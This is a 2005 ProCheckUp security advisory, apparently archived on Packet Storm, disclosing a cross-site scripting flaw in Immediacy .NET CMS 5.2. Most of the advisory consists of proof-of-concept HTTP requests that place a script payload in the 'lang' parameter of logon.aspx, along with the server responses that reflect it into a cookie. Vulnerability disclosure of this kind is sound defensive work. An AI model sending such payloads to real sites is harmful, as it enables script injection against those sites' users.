exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ProCheckUp Security Advisory 2005.6

ProCheckUp Security Advisory 2005.6
Posted Nov 9, 2006
Authored by ProCheckUp, Gemma Hughes

PR05-06 - Immediacy .NET CMS suffers from a possible cross site scripting flaw due to a malformed cookie.

tags | advisory, xss
SHA-256 | fb6ad385d3b7ef064e8cf1ee5f2e243b59cf542100931cd66d5295a3cda843f4

ProCheckUp Security Advisory 2005.6

Change Mirror Download
PR05-06: Immediacy .NET CMS possibly vulnerable to Cross Site Scripting
through a malformed cookie

This advisory has been published following consultation with UK NISCC
<http://www.niscc.gov.uk/>

Date found: 2005-02-27

Vulnerable: Immediacy .NET CMS 5.2

Severity: Low

Author: Gemma Hughes [gemma.hughes at procheckup.com]

Vendor Status: CVE Candidate not Assigned

Description:

Immediacy CMS appears to allow Cross Site Scripting attacks via a
malformed 'Set-Cookie:' header. This issue concerns the 'logon.aspx'
program and 'lang' variable. This could allow attackers to cause the
execution of malicious script code within the context of the vulnerable
site.

Note: web browser-specific CRLF injection techniques may be required in
order to exploit this issue.


Information:

REQUEST:

GET
/logon.aspx?lang=<SCRIPT>alert('Can%20Cross%20Site%20Attack')</SCRIPT>
HTTP/1.1
Host: example.host.co.uk
Cookie: ASINFO=...; ASP.NET_SessionId=...; CNBOOK=...;
ASPSESSIONIDSCDAQTST=...
Referer: http://example.host.co.uk:80/environ.pl
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461;
.NET CLR 1.0.3705)
Connection: close


RESULT:

HTTP/1.1 302 Found
Connection: close
Date: Sun, 27 Feb 2005 19:18:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: /generalerror.aspx?aspxerrorpath=/logon.aspx
Set-Cookie: lang=<SCRIPT>alert('Can Cross Site Attack')</SCRIPT>;
expires=Mon, 27-Jun-2005 18:18:31 GMT; path=/
Content-Type: text/html; charset=utf-8
Content-Length: 161
Set-Cookie: ASINFO=...
Set-Cookie: CNBOOK=...
Cache-Control: proxy-revalidate

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a
href='/generalerror.aspx?aspxerrorpath=/logon.aspx'>here</a>.</h2>
</body></html>



It is also possible to submit the request using byte-encoded characters:

REQUEST:

GET
/logon.aspx?lang=%3CSCRIPT%3Ealert%28'Can%20Cross%20Site%20Attack'%29%3C%2FSCRIPT%3E&page=272&

HTTP/1.1
Host: example.host.co.uk
Cookie: ASINFO=...; lang=cy; ASP.NET_SessionId=...; CNBOOK=ClearNet;
ASPSESSIONIDSCDAQTST=...
Referer: http://example.host.co.uk:80/default.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461;
.NET CLR 1.0.3705)
Connection: close

RESULTS:

HTTP/1.1 302 Found
Connection: close
Date: Sun, 27 Feb 2005 19:29:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: /generalerror.aspx?aspxerrorpath=/logon.aspx
Set-Cookie: lang=<SCRIPT>alert('Can Cross Site Attack')</SCRIPT>;
expires=Mon, 27-Jun-2005 18:29:27 GMT; path=/
Content-Type: text/html; charset=utf-8
Content-Length: 161
Set-Cookie: ASINFO=...
Set-Cookie: CNBOOK=ClearNet;path=/;domain=.host.co.uk;expires=Fri, 31
Dec 2010 00:00:01 GMT
Cache-Control: proxy-revalidate

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a
href='/generalerror.aspx?aspxerrorpath=/logon.aspx'>here</a>.</h2>
</body></html>


Consequences:

An attacker might cause the execution of malicious script code in the
client (web browser) within the context of the site running the
vulnerable version of Immediacy .NET CMS.

Fix: Contact vendor. Ensure all input is filtered, especially the '<'
and '>' characters.

References:

http://www.procheckup.com/Vulner_PR0506.php
http://www.immediacy.co.uk/

Legal:

Copyright 2005 ProCheckUp Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the
Internet community for the purpose of alerting them to problems, if and
only if the Bulletin is not
changed or edited in any way, is attributed to ProCheckUp, and provided
such reproduction and/or distribution is performed for non-commercial
purposes. Any other use of this
information is prohibited. ProCheckUp is not liable for any misuse of
this information by any third party.

Login or Register to add favorites

File Archive:

December 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    2 Files
  • 2
    Dec 2nd
    12 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    14 Files
  • 6
    Dec 6th
    18 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close